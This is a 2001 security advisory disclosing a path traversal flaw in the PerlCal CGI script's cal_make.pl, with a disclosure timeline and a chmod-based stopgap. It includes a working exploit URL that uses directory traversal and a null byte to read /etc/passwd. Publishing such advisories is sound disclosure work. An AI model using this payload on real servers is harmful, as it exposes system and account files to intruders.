The Unix versions of the PerlCal CGI script have vulnerabilities which allow website visitors to view any file on the webserver. Exploit URL included.
6008fabe1a329e1cad455aa8c84eeb5e7a5393d69a639699c592aa9613882baf
[whizkunde security advisory: PerlCal (CGI)]
http://www.whizkunde.org | stan@whizkunde.org
----------------------------------------------------------
Release date: April 27th 2001
Subject: PerlCal (CGI) security problem
Systems affected: *NIX (not windows) systems running
PerlCal CGI script
Vendor: http://www.perlcal.com
----------------------------------------------------------
1. problem
cal_make.pl of the PerlCal script may allow remote users
(website visitors) to view any file on a webserver (depending
on the user the webserver is running on).
Regard this URL:
http://www.VULNERABLE.com/cgi-bin/cal_make.pl?
p0=../../../../../../../../../../../../etc/passwd%00
This will display the /etc/passwd (if the webserver user has
access to this file).
2. fix
I warned the PerlCal vendor three weeks ago. After a
reaction, I gave him some time and tips to release a fix.
Because the vendor still hasn't fixed the problem and because
he didn't notice me why he hasn't released a patch yet, I
released this advisory.
I really hope the vendor will release a patch in the very
near future.
In the meantime it might be a good idea to just chmod 000
your PerlCal scripts.
----------------------------------------------------------
Stan a.k.a. ThePike
stan@whizkunde.org
http://www.whizkunde.org
Copyright whizkunde security team 2001